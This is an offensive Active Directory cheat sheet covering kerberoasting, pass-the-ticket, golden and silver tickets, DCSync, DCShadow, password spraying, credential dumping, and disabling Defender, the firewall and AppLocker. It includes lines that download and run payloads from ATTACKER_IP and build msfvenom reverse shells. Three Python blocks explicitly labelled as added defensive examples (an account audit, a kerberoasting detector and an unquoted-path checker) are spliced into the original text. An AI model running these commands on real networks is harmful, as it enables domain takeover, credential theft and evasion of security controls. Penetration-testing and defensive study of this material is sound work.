ACTIVE DIRECTORY: TOOLS

Tools that attackers use to penetrate and compromise Active Directory include:

Mimikatz - Described as "a little tool to play with Windows security", Mimikatz is probably the most widely used and most versatile AD exploitation tool. It provides a variety of methods for grabbing LM/NTLM hashes, Kerberos tickets, etc.
PowerSploit - A PowerShell-based toolkit for recon, exfiltration, persistence, etc.
BloodHound - A graphical tool for finding relationships in AD environments that help speed the path to privileged access.
DeathStar - Shows how information collected from BloodHound and other tools can be used to automate the elevation to Domain Admin (or similar).

Service Principal Names (SPNs)

Service accounts leverage SPNs to support Kerberos authentication, which leaves a trail to exactly where these accounts are and what they are used for. This information can be easily exploited by an attacker. Using PowerShell, list all domain service accounts that have registered SPN values:

#Build LDAP filter to look for users with SPN values registered for the current domain
$ldapFilter = "(&(objectclass=user)(objectcategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
#Execute search
$results = $search.FindAll()
#Display SPN values from the returned objects
foreach ($result in $results) {
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User Name = " $userEntry.name
    foreach ($SPN in $userEntry.servicePrincipalName) {
        Write-Host "SPN = " $SPN
    }
    Write-Host ""
}

LOCATE ALL ACCOUNTS WITH "svc" IN THE NAME:

#Build LDAP filter to look for users with service account naming conventions
$ldapFilter = "(&(objectclass=Person)(cn=*svc*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
#Add the list of properties to load
$objProperties = "name"
foreach ($i in $objProperties) { [void]$search.PropertiesToLoad.Add($i) }
#Execute search
$results = $search.FindAll()
#Display values from the returned objects
foreach ($result in $results) {
    $userEntry = $result.GetDirectoryEntry()
    Write-Host "User Name = " $userEntry.name
    Write-Host ""
}

To search Active Directory for service accounts, you need to investigate the values of an object's user account control settings. Swap the first line of the above script for the line below to accomplish this (the 1.2.840.113556.1.4.803 matching rule is a bitwise AND; 65536 is the DONT_EXPIRE_PASSWD bit):

$ldapFilter = "(&(objectclass=user)(objectcategory=user)(useraccountcontrol:1.2.840.113556.1.4.803:=65536))"

Windows Registry

The data is structured in a tree format. Each node in the tree is called a key. Each key can contain both subkeys and data entries called values.

Registry Hive - A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files loaded into memory when the operating system is started or a user logs in. Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user's hive contains specific registry information pertaining to the user's application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. Most of the supporting files for the hives are in the %SystemRoot%\System32\Config directory. These files are updated each time a user logs on.

Elevation of Privileges

General
# PowerShellMafia
# Always use the dev branch; the others are shit.
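The two LDAP filters above give the raw material for a service-account review; what a defender wants next is a list of which of those accounts are worth worrying about. The following is an added example (not code from the original page) that applies the same two conditions offline, an SPN being present and userAccountControl carrying bit 65536 (0x10000, DONT_EXPIRE_PASSWD, which is what the bitwise-AND filter matches), together with password age, supported encryption types and privileged group membership. All account records are constructed sample data; treating an absent msDS-SupportedEncryptionTypes as RC4-capable is an assumption made here.

```python
# Added example, not from the original page: offline audit of
# service-account records for Kerberoast exposure.
from dataclasses import dataclass, field
from datetime import datetime

# userAccountControl bits (AD schema values)
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_EXPIRE_PASSWD = 0x10000          # 65536, the value used in the LDAP filter

# msDS-SupportedEncryptionTypes bits
ETYPE_RC4_HMAC = 0x04
ETYPE_AES128 = 0x08
ETYPE_AES256 = 0x10


@dataclass
class Account:
    sam: str
    spns: list = field(default_factory=list)
    uac: int = 0
    pwd_last_set: datetime = datetime(2000, 1, 1)
    enc_types: int = 0                    # 0 = attribute absent
    groups: list = field(default_factory=list)


def audit(accounts, now, max_pwd_age_days=365):
    """Return [(sAMAccountName, [reasons])] for enabled accounts with SPNs
    that look like attractive Kerberoast targets."""
    findings = []
    for acct in accounts:
        if not acct.spns or acct.uac & UF_ACCOUNTDISABLE:
            continue                      # no SPN, or disabled: not kerberoastable
        reasons = []
        if acct.uac & UF_DONT_EXPIRE_PASSWD:
            reasons.append("password never expires")
        if (now - acct.pwd_last_set).days > max_pwd_age_days:
            reasons.append("password older than %d days" % max_pwd_age_days)
        # Assumption: an absent attribute is treated conservatively as
        # RC4-capable, since RC4 tickets are the ones that crack fastest.
        if acct.enc_types == 0 or acct.enc_types & ETYPE_RC4_HMAC:
            reasons.append("RC4 service tickets allowed")
        if "Domain Admins" in acct.groups:
            reasons.append("member of Domain Admins")
        if reasons:
            findings.append((acct.sam, reasons))
    return findings


# Constructed sample records (not from a real directory).
SAMPLE_ACCOUNTS = [
    Account("svc_sql", ["MSSQLSvc/sql01.ecorp.local:1433"], uac=0x10200,
            pwd_last_set=datetime(2019, 3, 10), enc_types=0,
            groups=["Domain Admins"]),
    Account("svc_web", ["HTTP/web01.ecorp.local"], uac=0x200,
            pwd_last_set=datetime(2024, 4, 1),
            enc_types=ETYPE_AES128 | ETYPE_AES256),
    Account("svc_legacy", ["CIFS/fs01.ecorp.local"], uac=0x10202,
            pwd_last_set=datetime(2015, 1, 1)),          # disabled: skipped
    Account("jdoe", [], uac=0x200, pwd_last_set=datetime(2024, 5, 1)),
]
AUDIT_TIME = datetime(2024, 6, 1)


def audit_sample():
    return audit(SAMPLE_ACCOUNTS, AUDIT_TIME)


if __name__ == "__main__":
    for sam, reasons in audit_sample():
        print(sam, "->", "; ".join(reasons))
```

Only svc_sql is reported: a never-expiring, five-year-old, RC4-capable password on a Domain Admin service account is the worst case the filters above can surface, while svc_web (AES only, recent password) is clean and the disabled legacy account is ignored.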
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"

# Sherlock
https://github.com/rasta-mouse/Sherlock

# Unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Kerberoast

The simple logic of kerberoasting is requesting service tickets and cracking them offline (the cracking itself produces no logs). For Kerberos to work, the clocks of attacker and victim must be within 5 minutes of each other.

# Rubeus
.\Rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234

# List available tickets
setspn.exe -t evil.corp -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
cscript.exe GetUserSPNs.vbs

# List cached tickets
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

# Request tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

# Requesting remotely
python GetUserSPNs.py -request ECORP/morph3:supersecurepassword@127.0.0.1

# Extract tickets
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Crack tickets
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

Juicy Potato

https://github.com/ohpe/juicy-potato/releases
Pick one CLSID from here according to your system:
https://github.com/ohpe/juicy-potato/tree/master/CLSID
Required privileges: SeAssignPrimaryTokenPrivilege, SeImpersonatePrivilege
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

Stored Credentials

# To check if there are any stored credentials
cmdkey /list
# Using them
runas /user:administrator /savecred "cmd.exe /k whoami"

Impersonating Tokens with meterpreter

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

Lateral Movement

PsExec, SmbExec, WMIExec, RDP, PTH in general. WinRM is always good. Check groups carefully. Since Windows gained OpenSSH support we should also consider SSH.

Mimikatz Ticket PTT (pass the ticket)
Enable-PSRemoting
mimikatz.exe '"kerberos::ptt C:\Users\Public\ticketname.kirbi"' "exit"
Enter-PSSession -ComputerName ECORP

WinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp

PTH with Mimikatz
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

Database Links

# PowerUpSQL
https://github.com/NetSPI/PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql"
# To see linked servers
select srvname from master..sysservers;
# Native
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
# Linked database tables
select * from openquery("ECORP\FOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES')
# You can also use the meterpreter module exploit/windows/mssql/mssql_linkcrawler
# With the meterpreter module you can find linked databases and whether you are admin on them.
# You can run a query and try to enable xp_cmdshell on that server
select * from openquery("server", 'select * from master..sysservers')
EXECUTE AS USER = 'internal_user' ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server"

Golden and Silver Tickets

The keys depend on the ticket type:
--> for a Golden ticket, they come from the krbtgt account;
--> for a Silver ticket, they come from the computer account or service account.

# Golden Ticket
# Extract the hash of the krbtgt user
lsadump::dcsync /domain:evil.corp /user:krbtgt
lsadump::lsa /inject
lsadump::lsa /patch
lsadump::trust /patch
# Creating the ticket
# /rc4 or /krbtgt - the NTLM hash
# /sid - you will get this from the krbtgt dump
# /ticket parameter is optional; the default is ticket.kirbi
# /groups parameter is optional; the default is 513,512,520,518,519
# /id - you can fake users and supply a valid Administrator id
kerberos::golden /user:morph3 /domain:evil.corp /sid:domain-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
kerberos::ptt ticket.kirbi
# You can also add /ptt to the kerberos::golden command
# After this the final ticket must be ready
# You can now verify that your ticket is in your cache
powershell.exe -c "klist"
# Verify that the golden ticket is working
dir \\DC\C$
psexec.exe \\DC cmd.exe
# Purge the currently cached kerberos tickets
kerberos::purge
# The metasploit module can also be used for golden tickets; it loads the ticket into the given session
post/windows/escalate/golden_ticket

# Silver Ticket
# A Silver Ticket allows escalation of privileges on DC
# /target - the server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433, ...)
# /service - the service name for the ticket (ex: cifs, rpcss, http, mssql, ...)
# Examples
kerberos::golden /user:morph3 /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local:1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103
sqlcmd -S evilcorp-sql102.evilcorp.local
select SYSTEM_USER;
GO
kerberos::golden /user:JohnDoe /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt

AD Attacks

Enumeration
# Basic ldap enumeration
enum4linux -a 192.168.1.2
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

Bruteforce on LDAP
# Password spray
https://github.com/dafthack/DomainPasswordSpray
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3
# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt
# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt

DCShadow

The DCShadow attack aims to inject a rogue Domain Controller into the AD infrastructure so that we can then dump actual AD members.
# Find the SID for the user
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
# This will create an RPC server and listen
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
# Run this from another mimikatz
lsadump::dcshadow /push
# After this, unregistration must be done
# Relogin
lsadump::dcsync /domain:ECORP.local /user:krbtgt
# Now you must have the krbtgt hash
https://attack.stealthbits.com/how-dcshadow-persistence-attack-works/

DCSync

lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt

https://gist.github.com/monoxgas/9d238accd969550136db
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL

Bypass-Evasion Techniques

Powershell Constrained Language Bypass
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
# PSByPassCLM
powershell.exe -exec bypass -c

Windows Defender
sc config WinDefend start= disabled
sc stop WinDefend
# Powershell
Set-MpPreference -DisableRealtimeMonitoring $true
# Remove definitions
"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Firewall
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
# IP whitelisting
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

AppLocker Bypass
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
# Multistep process to bypass AppLocker via MSBuild.exe:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001 -f csharp -e x86/shikata_ga_nai -i > out.cs
# Replace the buf-sc and save it as out.csproj
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xml
Invoke-WebRequest "http://ATTACKER_IP/payload.csproj" -OutFile "out.csproj"; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj
# or you can simply use my tool :)
https://github.com/morph3/Msbuild-payload-generator
sudo python msbuild_gen.py -a x86 -i 10 --lhost 192.168.220.130 --lport 9001 -m

GreatSCT
# This also needs Veil-Framework
python GreatSCT.py --ip 192.168.1.56 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload1.exe
python3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp --ip 192.168.1.56 --port 9001
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

EvilSalsa
# Preparing payloads
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
EncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
# Executing payload
SalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001
# Reverse icmp shell
python icmpsh_m.py "ATTACKER_IP" "VICTIM_IP"
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP

Miscellaneous

Changing permissions of a file
icacls text.txt /grant Everyone:F

Downloading files
IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")
Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"
certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe

Adding a user to Domain Admins
Add-DomainGroupMember -Identity 'Domain Admins' -Members morph3 -Verbose

Base64 encode/decode
certutil -decode foo.b64 foo.exe
certutil -encode foo.exe foo.b64

Network sharing
# Local share
net share
wmic share get /format:list
# Remote share
net view
net view \\dc.ecorp.foo /all
wmic /node:dc.ecorp.foo share get
# Mounting share
net use Z: \\127.0.0.1\C$ /user:morph3 password123

Port Forwarding
# Port forward using plink
plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
# Port forward using meterpreter
portfwd add -l attacker-port -p victim-port -r victim-ip
portfwd add -l 3306 -p 3306 -r 192.168.1.56

Powershell Portscan
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("VICTIM_IP",$_)) "Port $_ is open!"} 2>$null

Recovering Powershell Secure String
$user = "morph3"
$file = "morph3-pass.xml"
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }

[System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($cred.Password))

$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
$result

Injecting PowerShell scripts into sessions
Invoke-Command -FilePath scriptname -Session $sessions
Enter-PSSession -Session $sess

Enable RDP
# CMD
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
# Powershell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# Optional
net localgroup "Remote Desktop Users" morph3 /add
# Re-enabling the firewall rules
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall add rule name="allow RemoteDesktop" dir=in protocol=TCP localport=3389 action=allow

Decrypting EFS files with Mimikatz
Follow the link here: How to Decrypt EFS Files
privilege::debug
token::elevate
crypto::system /file:"C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert" /export
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id"
# Clear text password
dpapi::masterkey /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey" /password:pass123
# After this command you must have the exported .der and .pvk files
dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b
openssl x509 -inform DER -outform PEM -in blah.der -out public.pem
openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem
openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# Import the certificate
certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot
type "C:\Users\Administrator\Documents\encrypted.txt"

Post exploitation - information gathering

Reading Event Logs
The user must be in the "Event Log Readers" group. Follow this link.
Get-WinEvent -ListLog *
# Listing the logs of a specific computer with supplied credentials
$cred = Get-Credential
Get-WinEvent -ListLog * -ComputerName AD1 -Credential $cred
# Reading Security logs
(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName';expression={ $_.Properties[5].Value }}, @{name='CommandLine';expression={ $_.Properties[8].Value }}).commandline

Password Dump
# Metasploit
post/windows/gather/enum_chrome
post/multi/gather/firefox_creds
post/firefox/gather/cookies
post/firefox/gather/passwords
post/windows/gather/forensics/browser_history
post/windows/gather/enum_putty_saved_sessions
# Empire
collection/ChromeDump
collection/FoxDump
collection/netripper
credentials/sessiongopher
# mimikatz
privilege::debug
sekurlsa::logonpasswords

Shadow copy
There might be a case where you are privileged but cannot get read access to locked files (NTDS.dit, SYSTEM etc.).
diskshadow.exe
set context persistent nowriters
add volume C: alias morph3
create
expose %morph3% Z:
# Deletion
delete shadows volume %morph3%
reset

NTDS.dit dump
secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
python crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com --ntds drsuapi
# On the DC, lsass.exe can dump hashes
lsadump::lsa /inject

Summary of tools
AD environment: icebreaker, bloodhound
Post exploitation: Empire, DeathStar, CrackMapExec (CME), Covenant, Rubeus, SharpDPAPI
Bypass: Ebowla, Veil-Framework, PsBypassCLM
Swiss knife: impacket

Windows Kernel

Vulnerabilities in the Windows kernel are published from time to time, many of which can be used to escalate privileges.
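The Kerberoast section above notes that the cracking step is offline and silent; the ticket requests themselves are not. Each service-ticket request is recorded by the domain controller as Security event 4769 (when "Audit Kerberos Service Ticket Operations" is enabled), and a kerberoasting run stands out as one account requesting RC4-encrypted tickets (TicketEncryptionType 0x17) for many distinct SPNs within a short window. The following is an added example (not code from the original page) of that detection logic run over constructed 4769 records in a simplified dict shape; the field names follow the event's XML, the threshold of 3 services in 5 minutes is an assumption chosen for the example.

```python
# Added example, not from the original page: detect a kerberoasting burst
# in 4769 "A Kerberos service ticket was requested" events.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17          # TicketEncryptionType for RC4 tickets (the crackable kind)

# Constructed sample events (simplified 4769 fields; not real log data).
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-06-01T09:14:02", "TargetUserName": "morph3@ECORP.LOCAL",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    {"TimeCreated": "2024-06-01T09:14:03", "TargetUserName": "WS01$@ECORP.LOCAL",
     "ServiceName": "FS01$", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.21"},
    {"TimeCreated": "2024-06-01T09:14:05", "TargetUserName": "morph3@ECORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    {"TimeCreated": "2024-06-01T09:14:07", "TargetUserName": "morph3@ECORP.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    {"TimeCreated": "2024-06-01T09:14:09", "TargetUserName": "morph3@ECORP.LOCAL",
     "ServiceName": "svc_missing", "TicketEncryptionType": "0x17", "Status": "0x7", "IpAddress": "10.0.0.55"},
    {"TimeCreated": "2024-06-01T09:14:11", "TargetUserName": "morph3@ECORP.LOCAL",
     "ServiceName": "svc_report", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.55"},
    {"TimeCreated": "2024-06-01T09:20:00", "TargetUserName": "alice@ECORP.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.80"},
    {"TimeCreated": "2024-06-01T09:21:00", "TargetUserName": "alice@ECORP.LOCAL",
     "ServiceName": "svc_legacy", "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.80"},
    {"TimeCreated": "2024-06-01T09:22:00", "TargetUserName": "WS01$@ECORP.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.21"},
]


def parse_event(raw):
    """Normalise one raw 4769 record: hex strings to ints, names lower-cased."""
    return {
        "time": datetime.fromisoformat(raw["TimeCreated"]),
        "user": raw["TargetUserName"].split("@")[0].lower(),
        "service": raw["ServiceName"].lower(),
        "etype": int(raw["TicketEncryptionType"], 16),
        "status": int(raw["Status"], 16),
        "ip": raw.get("IpAddress", ""),
    }


def detect_kerberoast(raw_events, min_services=3, window=timedelta(minutes=5)):
    """Alert when one account obtains RC4 tickets for >= min_services distinct
    services inside `window`. Returns a list of alert dicts."""
    requests = defaultdict(list)
    for ev in sorted(map(parse_event, raw_events), key=lambda e: e["time"]):
        if ev["etype"] != RC4_HMAC or ev["status"] != 0:
            continue                                  # only successful RC4 tickets
        if ev["service"] == "krbtgt" or ev["service"].endswith("$"):
            continue                                  # TGTs and machine accounts
        requests[ev["user"]].append(ev)

    alerts = []
    for user, evs in requests.items():
        for i, first in enumerate(evs):               # sliding window per user
            in_window = [e for e in evs[i:] if e["time"] - first["time"] <= window]
            services = sorted({e["service"] for e in in_window})
            if len(services) >= min_services:
                alerts.append({"user": user, "source_ip": first["ip"],
                               "start": first["time"], "services": services})
                break                                 # one alert per user is enough
    return alerts


def detect_sample():
    return detect_kerberoast(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in detect_sample():
        print("%s from %s at %s: RC4 tickets for %s" %
              (a["user"], a["source_ip"], a["start"], ", ".join(a["services"])))
```

On the sample, morph3 trips the rule with four RC4 service tickets in nine seconds; alice's single RC4 request to a legacy service and the workstation's machine-account traffic do not. Forcing AES on service accounts (msDS-SupportedEncryptionTypes) removes the 0x17 signal entirely and is the mitigation rather than the detection.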
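The "Unquoted paths" one-liner in the Elevation of Privileges section above (and the service-path discussion later on this page) lists services whose binary path is unquoted and contains spaces. What the audit needs to know is exactly which file names Windows will try before the real one, because each of those lives in a directory whose ACL must not allow unprivileged users to create files. The following is an added example (not code from the original page) that computes that search order, the directories to review, and the quoted form of the path that fixes the problem. The service records are constructed sample data; splitting the executable from its arguments at the first ".exe" is an assumption made for this example.

```python
# Added example, not from the original page: audit and fix for unquoted
# service paths containing spaces.
import re


def executable_part(image_path):
    """Return the executable portion of a service ImagePath.
    Assumption: for unquoted paths the executable ends at the first '.exe'."""
    path = image_path.strip()
    if path.startswith('"'):
        return path[1:path.index('"', 1)]          # quoted: the quoted text
    m = re.search(r"\.exe", path, re.IGNORECASE)
    return path[:m.end()] if m else path


def is_unquoted_with_spaces(image_path):
    path = image_path.strip()
    return not path.startswith('"') and " " in executable_part(path)


def search_order(image_path):
    """Candidates Windows tries, in order: every whitespace-delimited prefix
    with '.exe' appended, then the real executable."""
    exe = executable_part(image_path)
    if not is_unquoted_with_spaces(image_path):
        return [exe]
    tokens = exe.split(" ")
    candidates = [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]
    return candidates + [exe]


def directories_to_review(image_path):
    """Directories where a rogue candidate could be planted (ACLs to check)."""
    dirs = []
    for cand in search_order(image_path)[:-1]:
        d = cand.rsplit("\\", 1)[0]
        if d.endswith(":"):
            d += "\\"                                # drive root, e.g. C:\
        if d not in dirs:
            dirs.append(d)
    return dirs


def quote_image_path(image_path):
    """The remediation: quote the executable, keep its arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    exe = executable_part(path)
    return '"%s"%s' % (exe, path[len(exe):])


# Constructed sample services (name -> ImagePath), not a real registry dump.
SAMPLE_SERVICES = {
    "VendorSvc": r"C:\Program Files\Vendor Name\Service App\svc.exe -k run",
    "WavesSysSvc": r"C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe",
    "GoodSvc": r'"C:\Program Files\Good Vendor\good.exe" --service',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
}


def audit_sample():
    """Vulnerable services from the sample, with their search order."""
    return {name: search_order(p) for name, p in SAMPLE_SERVICES.items()
            if is_unquoted_with_spaces(p)}


if __name__ == "__main__":
    for name, order in audit_sample().items():
        print(name)
        for cand in order:
            print("   tries:", cand)
        print("   review ACLs on:", directories_to_review(SAMPLE_SERVICES[name]))
        print("   fix ImagePath to:", quote_image_path(SAMPLE_SERVICES[name]))
```

For VendorSvc the audit reports C:\Program.exe, C:\Program Files\Vendor.exe and C:\Program Files\Vendor Name\Service.exe as the names tried before the real binary; on a default install only C:\ and C:\Program Files are locked down, so the vendor's own directory is the one to check. The `sc config <name> binPath=` form of the quoted path is the fix.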
The following command can be used to retrieve installed patches and their dates:
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic can also be used to retrieve installed software and their versions:
wmic product get name, version

DLL Hijacking

To search for missing DLLs, PowerSploit can be used with the following script:
Find-ProcessDLLHijack
Hereafter, we can check the permissions on the directories that Windows searches for DLL files:
Find-PathDLLHijack
In the last step we can create a malicious DLL file with the following script:
Write-HijackDll

Unquoted Service Paths

Windows first tries to execute an executable file at the location where the first space is; e.g. for the service path C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe it tries C:\Program.exe first.

Unattended Installations

When administrators want to deploy images on a large number of devices without user interaction (called unattended installations) they use the Windows Deployment Services. However, this requires that the local system administrator's password or other privileged account passwords are stored in one or more of the following locations:
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

As an example, the following CMD commands can be used to search for passwords in configuration files:
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /si password *.dat

Furthermore, the following PowerSploit scripts can be used:
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword

